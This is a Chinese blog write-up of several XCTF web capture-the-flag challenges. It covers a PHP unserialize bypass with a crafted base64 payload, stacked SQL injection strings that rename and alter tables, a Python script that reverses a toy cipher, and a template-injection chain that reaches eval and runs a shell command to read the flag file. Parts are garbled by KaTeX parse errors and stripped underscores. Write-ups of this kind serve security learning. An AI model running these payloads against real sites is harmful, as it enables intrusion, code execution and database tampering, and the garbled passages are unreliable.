XCTF-web(五)

Web_php_unserialize

当通过KaTeX parse error: Expected group after '' at position 42: ...erialize,触发魔术方法_̲_wakeup和__destr...this->file)输出文件内容,若KaTeX parse error: Expected group after '' at position 17: ...ile可控,可读取任意文件。 _̲_wakeup 防御:若file不为index.php,会被重置为index.php。可通过属性个数溢出绕过(序列化时声明的属性个数大于实际个数,__wakeup不会执行)。

正则检测:preg_match('/[oc]:\d+:/i', $var)禁止包含o:或c:开头的序列化字符串。可利用NULL 字节截断让正则匹配失败(PHP 中preg_match遇到 NULL 字节会提前终止匹配)。

构造:/index.php?var=?TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

supersqli

看一下会输出什么

'1会报错

1';show databases -- #

1';show tables -- #

1';show columns from 1919810931114514 -- #

1';rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);-- #

1' or 1=1 #

inget

?id=1' or 1=1 -- #

web2

对密文进行 str_rot13 还原:由于 str_rot13 是双向变换,再次应用即可还原。

反转字符串:逆转加密时最后一步的 strrev。

Base64 解码:解开加密时的 base64_encode。

字符 ord 减 1:逆转加密时每个字符 ord+1 的操作。

再次反转字符串:逆转加密时第一步的 strrev。

csharp 复制代码
import base64
def python_decode(string):
    zimu = "abcdefghijklmnopqrstuvwxyz" 
    rot_13 ="" 
    for i in string: 
        if i.isdigit():
            rot_13 += i
        else:
            try:
                rot_13 += zimu[zimu.index(i)-13] 
            except:
                rot_13 += zimu[zimu.index(i.lower())-13].upper()
    fz = rot_13[::-1]
    base = base64.b64decode(fz)
    base = [chr(ord(i)-1) for i in base]
    fz = base[::-1]
    print "".join(fz)

python_decode("a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws")

结果:flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

Web_python_template_injection

输入/{{7+7}},测试存在模板注入

/{{''.class}}

/{{''.class .mro}}

/{{''.class .base .base .subclasses()}}

/{{''.class .base .base .subclasses()[168]}}

/{{''.class .base .base .subclasses ()[145].init .globals .builtins 'eval'}}

/{{''.class .base .base .subclasses ()[145].init .globals .builtins ['eval']('import("os").popen("cat fl4g").read()')}}

相关推荐
witkey_ak989614 小时前
网安面试题收集(4)
网络安全
网安INF17 小时前
网络攻防技术:防火墙技术
网络·安全·web安全·网络安全·防火墙
介一安全1 天前
【Frida Android】基础篇12:Native层hook基础——调用原生函数
android·网络安全·逆向·安全性测试·frida·1024程序员节
m0_738120721 天前
网络安全编程——TCP客户端以及服务端Python实现
python·tcp/ip·安全·web安全·网络安全
白帽子黑客罗哥1 天前
Redis实战深度剖析:高并发场景下的架构设计与性能优化
redis·网络安全·性能优化·高并发·分布式锁·秒杀系统·缓存架构
半路_出家ren1 天前
设计一个学生管理系统的数据库
linux·数据库·sql·mysql·网络安全·数据库管理员
儒道易行2 天前
【攻防实战】Redis未授权RCE联动metasploit打穿三层内网(上)
数据库·redis·网络安全·缓存
small_white_robot2 天前
vulnerable_docker_containement 靶机
运维·网络·web安全·网络安全·docker·容器
Bruce_Liuxiaowei3 天前
[特殊字符] C&C服务器:网络攻击的指挥中心
运维·服务器·网络安全
-曾牛3 天前
深入浅出 SQL 注入
网络·sql·安全·网络安全·渗透测试·sql注入·盲注